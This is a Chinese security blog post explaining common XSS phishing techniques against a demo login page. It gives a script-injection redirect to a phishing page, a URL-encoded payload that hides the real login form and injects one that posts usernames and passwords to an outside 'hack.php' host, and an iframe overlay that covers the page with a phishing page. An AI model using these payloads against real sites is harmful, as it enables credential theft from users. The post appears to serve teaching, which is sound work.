蜗蜗侠's Blog-关注网络安全移动版

主页 > 技术笔记 >

XSS常见的钓鱼方式

1.重定向钓鱼:
正常的用户URL为http://localhost/cookie1.php?user=UserName&pass=PassWord&name=login,由于我们的程序并没有对提交的数据进行处理,而直接输出,那么用户就可以通过提交特定的数据实现重定向。
XSS常见的钓鱼方式 - sn0w - 雪花 - sn0w
 当用户访问 ,页面被重定向到钓鱼页面。

http://localhost/cookie1.php?user=<script>document.location.href="http://127.0.0.1/phishing.html"</script>&pass=PassWord&name=login

XSS常见的钓鱼方式 - sn0w - 雪花 - sn0w
 

 

2.HTML注入式攻击

利用XSS向页面中插入HTML/Javascript代码,由于没有进行过滤,代码将直接被浏览器解析。

http://localhost/cookie1.php?user=%3Cscript%3Evar%20biaodan=document.getElementById%28%27login%27%29;biaodan.style=%22display:none%22%3C/script%3E%3Chtml%3E%3Cform%20action=%22192.168.0.1/hack.php%22%20method=%22get%22%3E%3Cinput%20type=%22text%22%20name=%22user%22%20value=%22UserName%22%3E%3Cinput%20type=%22text%22%20name=%22pass%22%20value=%22PassWord%22%3E%3Cinput%20type=%22submit%22%20name=%22name%22%20value=%22login%22%3E%3C/form%3E%3C/html%3E&pass=&name=login

浏览器解析后,隐藏了原来的登录表单,生成了一个新的表单并将数据提交到指定的地址。
XSS常见的钓鱼方式 - sn0w - 雪花 - sn0w
 

 3.XSS跨框架钓鱼

通过<iframe>标签嵌入一个远程域,以覆盖原有的页面

<div style="position:absolute;top:0px;left:0px;width:100%;height:100%"><iframe src=http://127.0.0.1/phishing.html width=100% height=100%></iframe></div>

详细看这篇日志:http://ixuehua.blog.163.com/blog/static/259952038201642532524650/
XSS常见的钓鱼方式 - sn0w - 雪花 - sn0w

 

4.flash钓鱼

等待补充。。。。

(责任编辑:蜗蜗侠)